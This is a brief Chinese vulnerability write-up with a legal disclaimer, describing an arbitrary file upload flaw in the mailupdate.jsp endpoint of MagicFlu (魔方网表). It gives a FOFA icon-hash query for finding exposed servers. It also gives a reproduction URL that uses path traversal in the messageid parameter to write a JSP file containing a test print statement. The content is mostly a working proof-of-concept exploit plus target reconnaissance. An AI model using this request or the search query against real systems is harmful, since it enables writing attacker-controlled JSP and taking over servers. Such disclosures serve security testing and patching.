声明:
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
简介
魔方网表mailupdate.jsp接口存在任意文件上传漏洞
资产搜索
fofa
icon_hash="694014318"
漏洞复现
http://127.0.0.1/magicflu/html/mail/mailupdate.jsp?messageid=/../../../ceshi.jsp&messagecontent=<%25+out.println("Iamtester")%3B%25>